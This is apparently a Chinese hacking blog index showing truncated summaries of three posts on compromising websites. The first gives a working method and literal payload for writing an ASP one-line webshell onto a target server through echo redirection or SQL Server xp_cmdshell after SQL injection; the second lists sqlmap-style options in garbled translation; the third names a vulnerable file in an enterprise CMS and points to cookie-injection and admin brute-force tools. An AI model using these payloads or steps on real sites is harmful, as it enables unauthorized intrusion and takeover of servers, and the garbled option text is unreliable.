天黑再动手

摘要： 在旁注过程中，可以执行cmd而权限又比较低的情况下，有时候可以用这个方法帮你拿下目标站。命令格式:Echo 语句 >目标站绝对目录例如：echo ^<^%execute request("cmd")%^> >D:\wwww\sb.asp这样访问目标站的目录下就会生成一个密码为0的asp的一句话，此方法在PHP等脚本语言均适用，大家灵活发挥。1.注入点后执行master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^(&q 阅读全文

摘要： -D直接直接连接到数据库 -U网址 - URL = URL目标URL -L使用burp,WebScarab代理日志解析目标保存在指定的文本文件 -M BULKFILE扫描多个目标入伍 -R REQUESTFILE负载的HTTP请求从一个文件 -G读取谷歌url，传说中的批量检测 -C从配置INI文件configfile中加载选项 要求： 这些选项可以用来指定如何连接到目标URL。 --data=DATA通过POST发送数据串 --cookie=COOKIE 的HTTP Cookie头 --cookie-urlencode U... 阅读全文

摘要： 产品介绍： 拥有企业网站常用的模块功能：企业简介模块、联系我们模块、新闻(文章)模块、产品 模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、 栏目管理、网站碎片、管理员与权限管理等等，所有模块的分类均支持无限级别的分类 ，可拓展性非常强大。其中包括万能的栏目管理系统、网站碎片管理系统，通过这些系 统，可以组合出各种不同的页面和应用。系统带强大灵活的后台管理功能、支持伪静态 URL页面功能、自定义Banner、LOGO功能等可为企业打造出大气漂亮且具有营销力的公 司网站。漏洞文件：shownews.asp使用穿山甲cookie注入工具 爆破管理用户名工具下载地址htt 阅读全文